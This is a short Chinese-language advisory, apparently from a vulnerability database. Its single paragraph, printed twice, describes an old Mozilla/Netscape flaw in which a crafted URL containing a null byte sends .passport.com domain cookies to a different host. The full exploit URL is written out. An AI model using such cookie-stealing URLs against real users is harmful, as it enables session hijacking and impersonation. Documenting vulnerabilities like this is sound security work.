VULHUB ™

Mozilla是种公开发放、免费使用、开放源码的WEB浏览器，可运行于绝大多数Unix/Linux系统上，也可运行在MacOS和微软Windows 9x/ME/NT/2000/XP上。Netscape类似Mozilla，也是一种这样的WEB浏览器。 Cookies常常被WEB站点用来验证用户身份，如果攻击者可以窃取某用户的cookies，就可以假扮该用户访问相应的WEB站点。Mozilla和Netscape都存在这样的安全漏洞。 比如在受影响的浏览器中加载如下URL http：//alive.znep.com\\%00www.passport.com/cgi-bin/cookies 将导致\".passport.com\"这个域对应的cookies被发往\"alive.znep.com\"。注意，这个漏洞只能窃取某个域对应的cookies，无法窃取特定主机对应的cookies。 为利用此漏洞不需要活动脚本的支持。

Mozilla是种公开发放、免费使用、开放源码的WEB浏览器，可运行于绝大多数Unix/Linux系统上，也可运行在MacOS和微软Windows 9x/ME/NT/2000/XP上。Netscape类似Mozilla，也是一种这样的WEB浏览器。 Cookies常常被WEB站点用来验证用户身份，如果攻击者可以窃取某用户的cookies，就可以假扮该用户访问相应的WEB站点。Mozilla和Netscape都存在这样的安全漏洞。 比如在受影响的浏览器中加载如下URL http：//alive.znep.com\\%00www.passport.com/cgi-bin/cookies 将导致\".passport.com\"这个域对应的cookies被发往\"alive.znep.com\"。注意，这个漏洞只能窃取某个域对应的cookies，无法窃取特定主机对应的cookies。 为利用此漏洞不需要活动脚本的支持。